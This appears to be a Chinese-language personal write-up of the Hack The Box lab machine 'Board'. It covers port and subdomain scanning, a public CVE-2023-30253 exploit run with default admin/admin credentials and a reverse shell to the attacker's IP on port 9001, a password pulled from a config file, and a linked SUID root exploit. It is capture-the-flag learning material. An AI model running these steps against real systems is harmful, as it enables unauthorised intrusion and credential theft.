Before all
Season 5我今天才上去看= =
這題都是基本技巧但我卡在提成root一小段時間 =w=
Attacker’s IP : 10.10.14.103
Victim’s IP : 10.10.11.11
Victim’s Host : board.htb
Write up
RECON
port scan
command:
1 | rustscan -a 10.10.11.11 --ulimit 5000 -- -sC -sV -Pn |
result:
很正常地開了 port 22的ssh和port 80的web服務
subdomain enumeration
command:
1 | wfuzz -c -w ~/wordlist/subdomains.txt -u "http://devvortex.htb/" -H "Host: FUZZ.devvortex.htb" |
因為彈出來都是 7 lines,重新改一下指令:
1 | wfuzz -c -w ~/wordlists/subdomains-10000.txt -u "http://board.htb/" -H "Host: FUZZ.board.htb" -hl 517 |
result:
找到子網域crm.board.htb
Exploit
CVE-2023-30253
進去網站後看到這個畫面:
由版本號獲取CVE-2023-30253(link)這個漏洞可能可以利用的資訊,嘗試猜測帳密admin/admin成功,在端口 9001 監聽:
1 | python3 CVE-2023-30253.py http://crm.board.htb admin admin 10.10.14.103 9001 |
成功
Previlige Escalation
conf file analyzation
根據linpeas提供的結果找到這個檔案/var/www/html/crm.board.htb/htdocs/conf/conf.php
戳下去就有密碼了:
嘗試拿它登入使用者larissa成功。
SUID LPE with CVE-2022-37706
再次看linpeas,注意SUID區LINPEAS未辨識的幾個檔案
上網GOOGLE就找到CVE PoC
https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit/blob/main/exploit.sh
RCE!!!
After all
累了,晚安世界